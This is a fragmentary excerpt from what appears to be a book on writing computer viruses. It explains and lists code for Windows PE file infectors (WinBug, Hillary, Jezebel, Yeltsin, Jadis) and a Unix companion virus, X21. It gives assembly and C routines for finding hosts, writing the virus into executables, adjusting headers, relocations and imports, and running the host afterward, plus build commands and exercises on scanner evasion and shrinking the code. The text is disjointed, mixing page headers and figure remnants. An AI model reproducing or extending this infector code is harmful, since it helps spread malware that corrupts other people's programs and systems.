mov [ebp+SRCH_HANDLE],eax ;else save search handle here
IFS1: call INFECT_FILE ;file found, infect it
lea eax,[ebp+FIND_DATA]
push eax
mov eax,[ebp+SRCH_HANDLE]
push eax
call FindNextFileA ;find next
or eax,eax ;anything found?
jnz IFS1 ;infect anything found
EXIT_IFILES:
ret ;else exit
with the underscore in it, from the file name reported by the Find
File. To do that, it simply copies the name at offset 44 in this
structure to a variable NFNAME, and throws on the underscore.
Next, it begins to open files. The basic approach to opening files is
to call CreateFileA, as follows:
push 0 ;open file for new host with ’_’
push 2 ;file attributes = hidden
push 1 ;create new file
push 0 ;no security
push 0 ;no sharing
push 40000000H ;write mode
lea eax,[ebp+NFNAME]
push eax ;@name of file
call CreateFileA
cmp eax,-1 ;failed to create new file?
je IFR ;yes, skip infect
mov [ebp+FHANDLE2],eax ;else save handle here
Wow! That’s even easier than it is in DOS! The host executes, and
nobody is any the wiser that a virus is lurking about.
Running WinBug
To assemble and link WinBug, use the commands:
tasm32 /ml winbug,,;
tlink32 /Tpe /aa /c /v winbug,winbug,, import32.lib
A Windows Companion Virus 177
Exercises
1. Write a WinBug virus using C++. All you have to do is convert the
assembler code to C, which is quite simple.
offsets, just as the COM infector did. By coding the start of the virus
like this:
VIRUS: call RELOC
RELOC: pop edi
one can get the actual 32-bit offset of RELOC as the virus is running
in the edi register, and then manipulate it as desired. For example,
if we then subtract,
sub edi,OFFSET RELOC
just like that most ancient COM infector. The next step the virus
will take is to build a stack frame for dynamic variables:
push ebp
sub esp,WORKSP
mov ebp,esp
will do quite nicely. This routine will infect all of the files which
FIND_FIRST_EXE and FIND_NEXT_EXE can locate. Of
course, it is in these subroutines where the big differences are.
Anyway, once the virus is done with its work, it must restore
the stack,
add esp,WORKSP
pop ebp
is sufficient, as long as the virus has explicitly set the value of HOST
when it made the infection. Unlike a COM file, the startup offset
of the host is not fixed. This value is specified in the PE file header,
and the actual offset may be relocated when the file is loaded into
memory. However, since a near jump is relative, the virus can insert
the proper number into the jump instruction in a file and it doesn’t
need to worry about it after that. We’ll discuss this more when we
examine the infection process.
As you can see, the basic functionality of the Hillary virus is
essentially the same as any other virus. For the most part, the main
control routine looks just the same as any other virus—and we could
discuss it with very little knowledge of the structure of the PE file.
The lesson you should learn here is this: don’t let 32-bit viruses
scare you. They are not any different, in principle, from any other
virus.
Okay, now let’s go on to look at how Hillary searches for hosts
to execute, and in the process learn how the Windows 95 API
works...
you get
call JMP1R
184 The Giant Black Book of Computer Viruses
.
.
.
JMP1R: jmp DWORD PTR [FindFirstFileRef]
the call to a jump which the assembler typically replaces a call with.
In the case of FindFirstFile, the secret number we want is given by
FIND_FIRST_FILE EQU 0BFF77893H
where N is the size of the virus in bytes. Thus, a virus that is 256
bytes long will be able to infect half of all programs. A virus that
is 500 bytes long will only be able to infect 2.3% of all programs.
Obviously, size is a very important consideration in writing a virus
like this.
512 bytes is really not much room for writing a virus in a 32-bit
environment. 32-bit code tends to hog up quite a bit of data fairly
fast. As such, an important consideration in the Hillary virus is
code-crunching. Although in my past books I’ve tended to stay
away from code crunching because it can quickly make code
difficult, if not impossible, to understand, there is good reason for
it here, so we will broach the subject.
.data section
raw data
.text section
raw data
PE EXE Header
PE Header
Thus, simply checking for space in the code section makes double-
infection impossible.
The checkup is carried out by the INFECT_FILE routine. The
first step is to open the file in read/write mode. There are two
possible API calls which could be used to open files in 32-bit
Windows, OpenFile and CreateFile. We’ll use the CreateFile
procedure because it requires the least amount of data to open a file.
All of the Windows API calls which we use in this book are
documented in the appendices on the Companion Disk, so you can
examine them in detail there. Basically the call to CreateFile looks
like this:
xor eax,eax ;we need to push a bunch of 0 dwords
push eax ;and this is most efficient here
push eax ;FATTR_NORMAL
push LARGE OPEN_EXISTING
push eax
push eax
push LARGE GENERIC_READ or GENERIC_WRITE
lea eax,[ebp+FIND_DATA+44] ;file name from search structure
push eax
call DWORD PTR [edi+CREATE_FILE]
each push eax requires only one byte. The xor eax,eax takes two
bytes. Thus, pushing four zero dwords can be accomplished in
2+4=6 bytes rather than in 2x4=8 bytes.
The next step after opening the file is to read enough data in to
get the DOS header, the DOS stub program, and the PE Header
along with at least the first Section Header. Hillary allocates a buffer
of 1024 bytes, which is more than sufficient to get this data in the
vast majority of programs.
Most Windows API functions allow a lot more functionality
than we really need, and that means pushing lots more parameters
onto the stack than actually mean anything to the virus. All of these
parameters require plenty of 32-bit code. Thus, in the interest of
code conservation, any API call that is required more than once
should be put in a single subroutine that can be called when needed.
In order to read the file, we define a subroutine FILE_READ which
will call the API function ReadFile. A typical FILE_READ func-
tion looks like this:
FILE_READ:
mov eax,edi
mov ebx,OFFSET READ_FILE
add ebx,eax
push LARGE 0 ;overlapping data structure
lea eax,[ebp+IOBYTES]
push eax ;address of bytes read
push ecx ;bytes to read
push edx ;buffer to read data into
push DWORD PTR [ebp+FHANDLE] ;file handle
call DWORD PTR [ebx]
or eax,eax ;set z if read failed
ret
Note that we are using ebx to build the address to call here, rather
than just using a call a call DWORD PTR [edi+ReadFile]. The
reason for this has to do with code crunching. We’ll explain it in a
few pages.
This FILE_READ routine is passed the number of bytes to read
in ecx, and the location to put those bytes in edx. Hillary uses it to
read 1024 bytes into FILEBUF a dynamic data area in the stack
frame,
mov ecx,1024
lea edx,[ebp+FILEBUF]
call FILE_READ
192 The Giant Black Book of Computer Viruses
Once the data is in memory, the virus can check the header infor-
mation out to see if this file can be infected.
The PE file format starts with an old-style DOS MZ header. To
find the PE header, one determines the size of the DOS header and
stub by checking the byte at offset 18H, which is the size of the
DOS MZ header. If it is greater than or equal to 40H, then it is an
extended format EXE file, and the size of the DOS part of the file
is stored in the word at offset 3CH.
After the end of the DOS part of the file, one will find an
extended EXE header. Typically these headers start with two letters
which define the format. The 16-bit Windows header starts with an
“ NE” and, appropriately enough, the PE Header starts with the
letters “ PE” followed by two nulls (since just about everything here
is oriented around 32-bit words).
Hillary first checks to see if the file is an extended EXE file,
and if so, it attempts to locate the PE header. Code to accomplish
this is given by
cmp BYTE [ebp+esi+18H],40H ;valid extended header?
jc IFEX ;no, just a DOS EXE, exit
mov ax,[ebp+FILEBUF+3CH] ;now find the PE header
cwde ;eax = offset where PE header starts
add esi,eax
mov eax,[ebp+FILEBUF] ;eax = PE header signature
cmp eax,’EP’ ;proper PE header?
jne IFEX ;nope, don’t attempt to infect
Note that esi is here set up so that ebp+esi point to the start of the
PE Header in the stack frame. It will be left pointing there for the
remainder of the infection process to permit easy access to the PE
Header and associated data structures.
If successful in locating the PE Header, Hillary next examines
it to see if there is room in the code section for the virus. To
understand this process, we must dig into the PE Header and the
Section Headers a little. The PE Header itself consists of three parts
(See Figure 16.4). The first is just the “ PE” signature. Next comes
the Image File Header, a data structure detailed in Figure 16.5. Next
is the Optional Image Header, detailed in Figure 16.6. Why it is
called optional I have no idea, as there is nothing at all optional
about it. Following these data structures comes the Section Table,
which is just an array of Section Headers (Figure 16.8).
Now, Hillary makes an important shortcut here. When most
compilers create a PE-EXE file, they put the code in the first
A Simple Parasitic Win-32 Virus 193
section, and label that section with the name .text. Rather than
searching all of the sections in the file for code, Hillary only checks
the first section. If this section is code, Hillary further checks to see
if there is room for itself there. If it is not code, Hillary doesn’t
attempt to infect the file. This appears to be a fairly reliable method,
as I have yet to find a file in which the first section was not code.
To check for code in the first section, Hillary examines the
Characteristics in the first Section Header. If bit 29 in this set of
flags is set, the section contains executable code. This is accom-
plished with the simple test,
test BYTE PTR [ebp+esi+PE_HEADER+36],20H
Then Hillary compares the resulting number with its own code size,
cmp eax,VIR_SIZE
jnc _IF3 ;ok, continue
If there is enough room (no carry flag) then this file is fit for
infection.
This contains the offset from the beginning of the file to the start
of the first section, e.g., to the start of the code. To this, the virus
adds the VirtualSize, or the size of the code itself,
add eax,[ebp+esi+PE_SIZE+8]
With that accomplished, eax points to the end of the code in the
file. Now, to call the SEEK_WRITE function in the virus, which
seeks to a given file position and writes a block of data there, eax
must be set to the position in the file to write to, edx must point to
the memory buffer to write from, and ecx must contain the number
of bytes to write. Since eax is already set up properly above, the
remaining code needed to write the virus to the file is given by
lea edx,[edi+OFFSET VIRUS]
mov ecx,VIR_SIZE
call SEEK_WRITE
Offset Size Name Description
Now, for the first section in the program, the RVAs become
fairly trivial. They are just the distance from the beginning of the
section to the item in question, plus the code base. Thus, if the entry
point for the code is at offset 3FAH from the start of the first section
in the file, then its RVA will be 3FAH plus the code base, which is
given by the BaseOfCode variable in the PE Header. The code to
calculate the new offset is given by
add eax,[ebp+esi+44] ;add BaseOfCode
mov [ebp+esi+40],eax ;and save AddressOfEntryPoint
when eax comes into this code from the above, containing the old
VirtualSize, which is just where the virus was written. These two
numbers are the only things that need to be modified in the header
in order to make the virus work. Once the above is accomplished,
the PE Header and the first Section Header can be written back to
disk using the SEEK_WRITE function.
The virus must modify the DWORD value to transfer control to the
host in the right place. Supposing ecx contains the (old) VirtualSize
of the host’s code, and eax contains the old entry point, the code to
compute the new distance to jump is given by
sub eax,ecx
sub eax,OFFSET HADDR+5 - OFFSET VIRUS
and then written to disk. The location to write to in the disk file is
the same location as where the body of the virus was written, plus
OFFSET HADDR+1 - OFFSET VIRUS. With that write, the
infection process is complete, and the virus goes on to look for
another host to infect.
Code Crunching
Code crunching—getting the computer to do something with
fewer bytes of code—is a dying art. With hard disk memory costing
only about ten cents per megabyte, and RAM costing only about
$5/megabyte, there is usually little motivation to try to write small
code. The object oriented techniques which have become so popu-
lar in programming today (whether they are joyfully accepted by
programmers or shoved down their throats is another matter) are
incredibly inefficient from the perspective of the size of code.
That’s why a word processor that took up 50K ten years ago now
takes up 30 megabytes, though it certainly hasn’t become anything
like 600 times more powerful.
Crunching code is certainly an art, too. It’s hard to teach
someone to crunch code effectively. Either you have a knack for it
or you don’t. So without trying to teach you in detail how to do it,
let me give you a few principles, and look at how they were applied
to Hillary to make it smaller and more effective.
200 The Giant Black Book of Computer Viruses
Let’s start with the last technique first, because it is so easy and
yet so easy to ignore. The easiest thing to do when assembling a
source is to tell the assembler to perform multiple passes. In 32-bit
code, a single pass assembler must assume that all relative jumps,
etc., are NEAR jumps, and all constants which haven’t been defined
otherwise yet are 32-bit constants. So, if I code a jump like this:
jz EXIT
.
.
EXIT:
program, and simply get rid of them. For example, instead of coding
the main control routine like this:
VIRUS:
.
.
.
call FIND_FIRST_EXE
jz EXIT_VIRUS
.
.
.
jmp HOST
This saves both a call and a ret instruction, a total of six bytes.
Likewise, one might look for groups of subroutines that could
be combined. For example, Hillary is coded with a routine called
SEEK_WRITE which seeks to a particular location in a file and then
writes there. This combination is efficient because a seek must be
performed before each write in the virus. Thus, it saves six bytes
per call to combine these routines instead of making separate seek
and write routines and calling them both each time.
Again, one might look for combinations of subroutines which
use common code, and try to combine them. Hillary does this with
its FILE_WRITE and FILE_READ routines, since they are iden-
tical except for the final call they make to the Windows API. So
rather than having two copies of all that code in the virus, the
202 The Giant Black Book of Computer Viruses
routines are combined, and the DWORD which forms part of the
call is determined dynamically, coding it as
call DWORD PTR [ebx]
rather than
call DWORD PTR [edi+WRITE_FILE]
etc. While setting up the dynamic call takes a few extra bytes, the
net result is a savings.
Finally, one can look for subroutines which can fall through to
other subroutines when they terminate. For example, the IN-
FECT_FILE routine might have ended like this:
call SEEK_WRITE
jmp IFEX
Then you can just get rid of the last two instructions and put RTN2
right after RTN1.
Another important global technique is to look at conditional
jumps in a routine, and figure out a way to get as many of them as
possible to be short jumps. Thus, for example, rather than coding a
series of jumps like this:
A Simple Parasitic Win-32 Virus 203
jz IFEX
. . .
jz IFEX
. . .
jz IFEX
. . .
IFEX:
where all might be 5-byte near jumps, one can code them as
jz _IF1
. . .
_IF1: jz _IF2
. . .
_IF2: jz IFEX
. . .
IFEX:
which might change two of them into 2-byte short jumps, or one
might code it as
jnz _IF0
IFEX: . . .
_IF0: . . .
jz IFEX
. . .
jz IFEX
Summary
The Hillary virus shows just how simple it can be to infect a
32-bit Windows program. There are some hurdles to get over in
order to call the Windows API, and learn a new file format, as well
as perhaps learning something about 32-bit coding. However, once
these basic ideas have been understood, infecting a PE style file is
just not that hard. In fact, it would appear to be even easier than
infecting an old DOS EXE file. The concepts behind infecting a file
are nothing different from what we’ve encountered before in deal-
ing with DOS files. Only the mechanics are slightly different.
Exercises
1. Look up the FindNextFile function in your 32-bit Windows references
and trace through it to see how the FIND_NEXT_EXE procedure
should look.
2. Study the Hillary virus and find some ways to make it smaller. How
small can you make it without removing functionality?
3. What if you make Hillary infect at most one file each time it executes?
Can you make it smaller?
4. What happens if the Hillary virus doesn’t modify the VirtualSize in the
Section Header when it infects a file?
206 The Giant Black Book of Computer Viruses
Chapter 17
A Multi-Section
Windows Virus
Source Code for this Chapter: \JEZZY\JEZZY.ASM
_IF1:
That puts the virus at the end of the file in the correct number of
blocks. There will be a little miscellaneous data filling the end of
the file, but that is not important. All that remains to be done is to
modify the header, and fix the jump to the host in the virus.
210 The Giant Black Book of Computer Viruses
(In the above, SH[j] is the array of section headers.) To get the
VirtualAddress for the .jezzy section, one simply adds Bytes to
the previous section’s VirtualAddress,
SH[jezzy].VirtualAddress=SH[last].VirtualAddress
+Bytes
where VIRUS is the label defining the start of the virus, and HADDR
is the label at the jump instruction,
HADDR: jmp HOST
at the end of the main control routine in the virus. This jump value
is stored to TEMP in memory and written to the infected file at the
location
Old File Size + OFFSET HADDR - OFFSET VIRUS + 1
To this, one must add the size of the number of the section headers
in the file, plus one (which is added by the virus):
xor eax,eax
mov ax,[ebp+esi+6] ;actual section count
inc eax ; +1
mov ecx,SEC_SIZE ;size of sec hdrs
mul ecx
add eax,ebx ;eax=size needed
At this point eax contains the total space needed if the infection
process is to be carried out successfully. This number can be
compared to the actual space available in FILEBUF
cmp eax,FB_SIZE ;will it fit buffer?
jnc CINO ;nope, exit with NZ set
Actually this takes a bit of a shortcut and just checks whether the
first four letters of the name are “ .jez” —but of course such a
shortcut will never result in a double-infected file. If everything is
okay, the CAN_INFECT procedure returns with Z set, signalling
the INFECT_FILE routine to proceed with the infection.
Exercises
1. Modify Jezebel so that it puts the host code in the .jezzy
section and puts its own code in the .text section. This is as simple
as renaming the sections in the memory image of the header before
writing it back to the host. Does this convey any advantage in
evading virus scanners? What if you rearrange the Section Headers
too? What if you have two .code sections instead?
Chapter 18
A Section-
Expanding Virus
Source for this Chapter: \YELTSIN\YELTSIN.ASM
and reading 12 bytes from there, comparing them with the start of
the virus. If they’re the same, then the virus is assumed to be there
already. This approach is no different than what many DOS-style
viruses use.
_IF1:
raw data size of this section. The code to accomplish this is given
by:
call FIND_LAST_EXEC ;find the last executable code section
jc IFEX ;if there isn’t one, just exit
mov [ebp+SECTION],al ;else store section number here
mov ecx,eax
dec ecx
call GET_SEC_PTR ;set ebx-section header
mov eax,[ebp+ebx+16] ;get orig raw data size for this section
mov [ebp+OLD_RAW],eax ;and save it here
On Disk
Section B
Section boundary
Code Padding
Header
However, the 8192 bytes reserved in memory for this code section
would still be enough room, so none of the sections would have to
be moved around in memory. The loader would just have to put less
padding in the section which it infected. Figure 18.2 illustrates how
the file we are discussing would look on disk and in memory so you
can see how this would work.
However, if you consider another file, which had 4000 bytes
of raw data in the code section, it would occupy 4096 bytes on disk
and 4096 bytes in memory. Adding 1876 bytes to it would require
6144 bytes on disk (the size rounded up to the nearest 512-byte
multiple) and 8192 bytes in memory (the size rounded up to the
nearest 4096-byte multiple). In such a case, the virus would have
to move the sections both on disk and in memory. (It is always the
case that if the sections have to be moved in memory, they will have
to be moved on disk.)
If a virus can get away with moving things on disk alone, it
faces a much simpler task than if it has to move things in memory.
Once we start moving things in memory, we must be aware that we
A Section-Expanding Virus 219
In memory
On Disk
Section C
Section boundary
Section B
Virus
Section boundary
Code Virus
Header
Section Header where the virus was placed to reflect the added size
of the virus. It then updates a number of fields in the PE Header,
including the CodeSize, the BaseOfData (if sections must be moved
in memory), and the ImageSize.
Finally, INSERT_VIRUS watches out for the stack. Yeltsin
uses over 8K of stack space so that it has buffers big enough to do
its job efficiently. However, a 32-bit windows program often only
starts out with a single 4K page of memory allocated for the stack
when the program starts up. To get more stack, the program must
ask the operating system for it. If it fails to, and yet attempts to use
the stack, a page fault is guaranteed to occur. This halts the program
right away. Yeltsin has the option of either requesting this addi-
tional stack space through the operating system after it is up and
running, or of modifying the PE Header in the host so that it gets
more stack when it first starts up. Yeltsin chooses the latter option
since, after all, the PE header is already sitting right there in
memory. This is accomplished by examining the StackCommit
variable in the header, and enlarging it if necessary:
mov eax,WORKSP ;stack space for virus
add eax,4096 ;padding for calls, etc.
call GET_MSIZE ;round up to pg size
cmp eax,[ebp+esi+100] ;comp w/StackCommit
jc IV1
mov [ebp+esi+100],eax ;update as needed
IV1:
Once the code has been inserted, more work must be done, but only
if sections need to be relocated in memory. This determination can
easily be made with GET_VMSIZE:
call MOVE_SECTIONS
call INSERT_VIRUS
call GET_VMSIZE ;do RVAs need update?
or eax,eax ;if eax=0, all is well
jz _IF2 ;update hdr and exit
. ;additional modifications needed
.
.
_IF2:
A Section-Expanding Virus 223
the sections must be moved in memory. Notice that the first element
in each Image Data Directory entry is an RVA. For example, the
first entry is the RVA of the start of the exported function table, the
second points to the imported function table, and so on. Because
code comes first in the ordinary PE file, most of these will be moved
by the virus, and they must have the return value from
GET_VMSIZE added to them to get them pointing back where they
should. This process is fairly easy. Suppose that ebp+ebx point to
the beginning of an entry in the Image Data Directory. Then code
like this:
call GET_VMSIZE ;get mem adjust in eax
add [ebp+ebx],eax ;add it to the RVA
will adjust the RVA in the Data Directory entry properly. However,
not all RVA’s need to be relocated. The virus has only moved part
of the sections in the file. Some sections—at least the code sec-
tion—will be in the same place they started out at. Thus, Yeltsin
needs a test to determine whether an RVA should be moved or not.
Such a test is easy to come up with. The virus itself will be placed
at a location in memory less than or equal to the lowest RVA of
anything that was moved. Thus, we can compare any RVA to the
RVA of the entry point of the virus—which is now the entry point
of the host—to see if it needs to be adjusted or not. This added test
transforms the above code into
call GET_VMSIZE ;get mem adjust in eax
mov ecx,[ebp+ebx] ;get the RVA in question
cmp ecx,[ebp+esi+40] ;compare with the entry point
jc WRT
add ecx,eax ;adjust if necessary
WRT: mov [ebp+ebx],ecx ;and update the RVA
DAT DB 0AAH
404520: DB 0AAH
Now if the program loader can load this into memory at the
ImageBase of 400000 where it was linked to, it doesn’t need to
adjust anything. However, if it must load the program to location
500000 instead, when it loads, the image will look like this:
5011C4: mov al,[404520]
504520: DB 0AAH
226 The Giant Black Book of Computer Viruses
Offset Size Name Description
The mov to al will not load it with 0AAH, but with whatever
value is at 404520H in memory, which will be some other program
or some unused area.
The relocation data in the PE file is what tells the program
loader that it must adjust the memory reference to 404520 if it loads
the program to a different memory location than ImageBase. Let’s
take a look at the mov instruction in machine language:
5011C4: A1 00404520
the wrong value. If the virus adjusted the sections 4096 bytes to
accommodate itself, the DAT variable will now be located at
405520H.
Obviously, if the virus does not adjust both the relocation data
and the actual values in the program to be relocated, the infected
program is not going to work correctly. This adjustment process is
carried out by the routine UPDATE_RELOCATIONS.
The first step in adjusting the relocation data is to adjust the
relocation table itself. Relocation data is stored in blocks in the
.reloc section. Each block starts with a header as detailed in Figure
18.3. The VirtualAddress field contains the RVA of the start of a 4
kilobyte block to which the relocations pertain. The SizeOfBlock
tells how big the block is. This header is followed by an array of
words. The number of words in this array can be determined from
SizeOfBlock,
# words = (SizeOfBlock-8)/2
Each word in the array supplies the low 12 bits of the RVA where
the relocation is, and the upper 4 bits are a flag to tell what type of
relocation data is required. The only valid flag values are 3, which
indicates a 32-bit dword relocation, and 0, which indicates that the
entry is just a filler to pad the table to an even number of dwords.
To relocate data, UPDATE_RELOCATIONS simply scans
through these blocks of relocation data and looks at the VirtualAd-
dress field in the header. If the VirtualAddress is greater than or
equal to the entry point for the program, it gets updated. If less than,
it is left alone. One needn’t mess with the 12-bit offsets at all in this
phase of fixing the relocations, because they only point to different
addresses within a page of data. When the virus moves sections
around in memory, it does so a whole page at a time. Thus, only the
dword page address needs to be changed.
The second step in fixing the relocation data is to go out to
where the actual vectors in the file reside, and fix them. They are
disbursed throughout the file, and they point all over the file. Since
the virus did not merely move everything up, it must go out and
check every single vector to see if it needs to be adjusted. To
accomplish this, UPDATE_RELOCATIONS goes through the
blocks of relocation data in .reloc and calls a subroutine PROC-
ESS_BLOCK. This subroutine reads the block of relocation data
228 The Giant Black Book of Computer Viruses
into RELBUF buffer in the stack frame, and it reads the raw data
which this block of relocations refers to into the FILEBUF buffer.
Next, it scans through the 12-bit offsets (which are now offsets into
FILEBUF), and looks at each dword which must be relocated,
adjusting it as necessary. When this process is complete, PROC-
ESS_BLOCK writes the raw data in FILEBUF back out to the file.
Each dword to be checked is actually an assumed offset in the
32-bit flat segment. To turn this value into an RVA, PROC-
ESS_BLOCK subtracts the ImageBase from it. Then, the RVA is
compared with the entry point for the program, as usual, and
adjusted accordingly in FILEBUF.
To understand this a bit better, let’s go back to our example
mov instruction,
4011C4: mov al,[404520]
404520: db 0AAH
Let’s suppose Yeltsin moves the .data section by 1000H when it
makes room for itself. Then the data byte 0AAH will be loaded to
405520 in memory by the loader, rather than 404520.
Along with this mov instruction, there will be an entry in the
relocation table. This entry will be in the block with VirtualAddress
1000H, and the word offset will be 31C5H, corresponding to a
relocation type 3 at offset 1C5H.
When Yeltsin adjusts this relocation, it will first look at the
VirtualAddress 1000H, recognize it as lying below the virus, and
leave this header value alone. On the next round, it will load all of
the vectors into memory, along with the block of code containing
the mov instruction. As it scans the relocation vector values, it will
come across the value 404520, which corresponds to RVA 4520H.
Since the virus is below this RVA, it will add the value returned by
GET_MVSIZE (1000H in our example) to 404520H. The result is
405520H. This value is saved back to FIELBUF and subsequently
written to the file.
Now, when the infected file is loaded, everything will come out
right.
Characteristics “USER32.DLL”
TimeDateStamp
ForwarderChain
Name
FirstThunk
Second IID
44
“GetMessage”
72
“LoadIcon”
Hint Name Array Import Address
19 Table
“TranslateMessage”
Image Import by
Name array
through the IID’s and the Image Import By Name Data to find the
names of the imported functions required by the program. You’ll
notice that the Image Import By Name data is duplicated in the array
pointed to by Characteristics and FirstThunk in the IID. Charac-
teristics and FirstThunk do not point to the same array, but rather
to two different, parallel arrays. When the loader loads a program
it reads through the array pointed to by FirstThunk and replaces
each entry in the Image Import By Name array with the actual
address of the function it is supposed to reference.
As you will recall, when a call to an imported procedure is made
by a program, it does not code it as
call ImportProc
but rather as
call XJP
this is mainly that it saves the loader a bit of time looking up all the
imported functions when the program is loaded.
Of course, the question arises, what happens when the loader
and the DLL aren’t properly matched? At first, one might think the
program will just transfer calls to imported functions to some
random spot in memory. However, a safety factor has been built
into the program loader so this won’t happen. When a DLL is bound
to a program, its date stamp is placed in the DateTime field in the
Image Import Descriptor. This date stamp is checked by the loader
before the direct memory addresses are used. If it differs from the
date stamp of the DLL by that name, the direct addresses are not
used—and this is why there are two Image Import By Name arrays.
The array pointed to by Characteristics can still be used to get the
proper import addresses, even when the file has been bound.
Anyway, Yeltsin has to be aware that files can be bound. If they
are, then the array associated to FirstThunk should not be touched
when adjusting RVA’s because it does not contain RVA’s, but
rather absolute addresses. To determine if the array associated to
FirstThunk contains RVA’s, one examines the DateTime field in
the IDD. If DateTime is zero, the DLL has not been bound. If it is
anything else, it is bound.
Next, both of the Image Import By Name arrays may contain
either RVA’s that point to a hint/name structure, or they may
contain an ordinal number which references the function number
in the DLL. If the high bit of an array entry is set, then the entry is
an ordinal number, and Yeltsin must leave it alone. If that high bit
is not set, the entry is an RVA, and Yeltsin should adjust it
accordingly.
Finally, we should note that the Image Import By Name arrays
are both null terminated, and this is the signal for UPDATE_IIBN
to stop processing an array.
and have all of the files available in the current directory. The result
will be YELTSIN.EXE, which may be executed to infect other files.
Exercises
1. Modify Yeltsin to insert itself directly after the raw data in the last code
section so that there is no gap there.
2. Modify Yeltsin so it will not infect files which require the relocation of
sections in memory. Remove everything that is no longer needed. How
big is Yeltsin now? Statistically speaking, what percentage of all
program files should Yeltsin be able to infect?
room for the larger code. The import data goes above these sections,
so they don’t need to be moved to make room for it.
In addition to physically moving the section on disk, the
MOVE_SECTIONS function adjusts the section headers in memory
to reflect the new locations of the sections, both on disk and in their
memory images.
The second part of making room for more import data is to
adjust relative virtual addresses (RVAs) properly wherever they
need to be adjusted throughout the virus. In Yeltsin the test for
whether an RVA needed adjustment was fairly simple. If it referred
to data below the start of the virus (which was the new entry point
of the program) then it was left alone, and if it was above that
address, the amount returned by GET_VMSIZE was added to it:
mov ebx,[RVA] ;get an RVA
cmp ebx,[ebp+esi+40] ;compare w/entry pt
jc NOADJUST ;no adjust necessary
call GET_VMSIZE ;eax=amount to add
add ebx,eax ;adjust the RVA
mov [RVA],ebx ;and save it again
NOADJUST:
.reloc
.rsrc
.reloc
.idata
.rsrc Space
.data made to in-
.idata MOVE_SECTIONS sert virus
.data
.text .text
Header Header
Virus import
data
Host import
data
Host import
data
0
Virus IIDs
0
but as
call IFctn
IFctn: jmp DWORD PTR [IMPORT_FUNCTION]
There will never be a reference to this data that does not have a
relocation vector pointing to it, so this solves the problem com-
pletely.
it writes the IID to the file. Once one DLL is complete, the
BUILD_IMPORT_DATA function reads another byte from
INAME_TABLE. If there are more DLLs to be processed, this byte
will be the first character in the name of the next DLL, and if there
are no more DLLs, this byte will be zero.
Once all of the DLLs have been processed, and all of the data
is built in the FILEBUF buffer, it is simply written to disk. The
process of building the data involves lots of calculating RVAs and
the details of this may be seen by examining the source code. With
this complete, all of the import data for the virus is set up. When
the program loader gets hold of the program, it will set up all of the
correct addresses in the Import Address Tables pointed to by the
FirstThunks in the IIDs.
Note that the call here is to an address dynamically built in the ebx
register. Here, IMPORT_FUNCTION is an ordinal that references
which function in this DLL is to be called. If ImportFunction is the
first function in the DLL that we imported, IMPORT_FUNCTION
will be 0, if it is the second, IMPORT_FUNCTION will be 4, and
so on. This provides an index into the Import Address Table. Next,
the number stored in JMPTBL+4*DLL_NUMBER is added to the
address. JMPTBL is an array of dwords, one for each imported
DLL, that is built by the parent virus when the infection is made. It
basically picks out which of the Import Address Tables to use.
Finally edi is added to ebx to account for the possibility that the
program was not loaded at the default Image Base by the program
loader. With the correct address calculated, the function is called.
We should take a closer look at how JMPTBL is set up, as it is
non-trivial. One might think that JMPTBL must simply contain the
RVAs of the Import Address Tables for each DLL that is imported.
However, one must note that edi is being added to ebx in order to
find the proper address to call, and this throws a glitch into things.
We really don’t want to add edi to the RVA of the Import Address
Table. Rather, we want to add the difference between the default
Image Base and the actual base address where the program was
loaded. The edi register will reflect both this change in base and
the fact that the virus does not start at the same RVA in every file.
To make this adjustment, the BUILD_IID function calculates the
expected value of edi for its child if the base isn’t moved, and
subtracts this from the RVA of the desired Import Address Table.
That value is then stored in the JMPTBL. Then, when edi is added
in by the calling function, the part due to the virus changing its RVA
is cancelled out, and the proper address is called.
Finally, Jadis must have a scheme for getting started. The
assembler and linker do not know how to set up all of the variables
needed to make this scheme work on the first generation. The
solution is to keep the old direct jump addresses around, and set the
JMPTBL up to point to them, so that on the first execution the virus
will have something proper to call to import the desired functions.
Note that these functions must be set up in exactly the same order
as they are in the INAME_TABLE, or you won’t get the right
function when performing a call [ebx].
A Sophisticated Windows File Infector 247
Offset Size Name Description
“NAME.DLL”
“Function5"
Function Addresses
Names
Name Ordinals
1 2 3 4 5 6 “Function6"
Exercises
1. Design a DLL infector which hooks one of the exported functions by
changing the export address to a function in the virus. To avoid too
much overhead, this function hook must not allow the replication
routines to be called too often if this function happens to be frequently
used.
2. Design a virus which inserts itself at the beginning of the first code
section instead of at the end.
3. Can you imagine a way where a virus might insert itself in the middle
of a code section?
with it, like the GNU C compiler. At the same time, I’ll try to keep
the discussion as implementation independent as possible.
A Basic Virus
One problem with Unix which one doesn’t normally face with
DOS and other PC-specific operating systems is that Unix is used
on many different platforms. It runs not just on 80386-based PCs,
but on 68040s too, on Sun workstations, on . . . . well, you name it.
The possibilities are mind boggling.
Anyway, you can certainly write a parasitic virus in assembler
for Unix programs. To do that one has to understand the structure
of an executable file, as well as the assembly language of the target
processor. The information to understand the executable structure
is generally kept in an include file called a.out.h, or something like
that. However, such a virus is generally not portable. If one writes
it for an 80386, it won’t run on a Sun workstation, or vice versa.
Writing a virus in C, on the other hand, will make it useful on
a variety of different platforms. As such, we’ll take that route
instead, even though it limits us to a companion virus. (Assembler
is the only reasonable way to deal with relocating code in a precise
fashion.)
The first virus we’ll discuss here is called X21 because it
renames the host from FILENAME to FILENAME.X21, and cop-
ies itself into the FILENAME file. This virus is incredibly simple,
and it makes no attempt to hide itself. It simply scans the current
directory and infects every file it can. A file is considered infectable
if it has its execute attribute set. Also, the FILENAME.X21 file
must not exist, or the program is already infected.
The X21 is quite a simple virus, consisting of only 60 lines of
c code. It is listed at the end of the chapter. Let’s go through it step
by step, just to see what a Unix virus must do to replicate.
calls an opendir function to open the directory file, and then one
repeatedly calls readdir to read the individual directory entries.
When done, one calls closedir to close the directory file. Thus, a
typical program structure would take the form
dirp=opendir(“.”);
while ((dp==readdir(dirp))!=NULL) {
(do something)
}
closedir(dirp);
Does FILE.X21
Y exist?
N
Copy FILE to
FILE.X21
Copy VIRUS to
FILE
if (!((*lc==’X’)&&(*(lc+1)==’2’)&&(*(lc+2)==1))) {
(do something)
and then makes a copy of itself with the name FILENAME. Quite
simple, really.
The final step the virus must take is to make sure that the new
file with the name FILENAME has the execute attribute set, so it
can be run by the unsuspecting user. To do this, the chmod function
is called to change the attributes:
chmod(“FILENAME”,S_IRWXU|S_IXGRP);
That does the job. Now a new infection is all set up and ready to be
run.
The final task for the X21 is to go and execute its own host.
This process is much easier in Unix than in DOS. One need only
call the execve function,
execve(“FILENAME.X21",argv,envp);
(Where argv and envp are passed to the main c function in the virus.)
